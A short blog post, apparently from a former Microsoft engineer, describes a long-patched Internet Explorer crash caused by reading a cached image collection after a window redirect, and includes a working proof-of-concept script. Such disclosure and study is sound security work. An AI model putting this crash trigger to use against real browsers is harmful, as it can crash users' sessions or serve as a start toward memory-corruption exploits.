DoS: Accessing Cached Element Collection After Page Redirect

Caching a reference to document.images from a newly opened window, then accessing an element from that collection after the window redirected to a new page, caused a crash in MSHTML!CElementCollectionTypeOperations::GetOwnItem. Exploitability was classified as UNKNOWN.

<script language="JavaScript">
var imagesColl;
function main()
{
	var win = window.open("redirect.aspx","","width=200,height=200");

	var wrapper = win.document.createElement("span");
	win.document.appendChild(wrapper);

	myDiv.innerHTML = '<img /><img /><img /><img /><img /><img /><img /><img />';

	imagesColl = win.document.images;

	setTimeout('alert(imagesColl[0])', 3000);
}
</script>

The redirect.aspx page performed a server-side redirect. By the time the setTimeout fired and accessed imagesColl[0], the original document had been replaced. The collection object remained alive in JavaScript but its underlying DOM elements had been torn down, leading to a null dereference inside CElementCollectionTypeOperations::GetOwnItem+0x127 when the collection tried to validate the vtable guard on a freed element.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [typeof Checks Cross-Origin Variable Existence via 'unknown' Return Value] :: [EoP: PROBABLY_EXPLOITABLE Crash via Rapid RSS/HTML iFrame Switching] >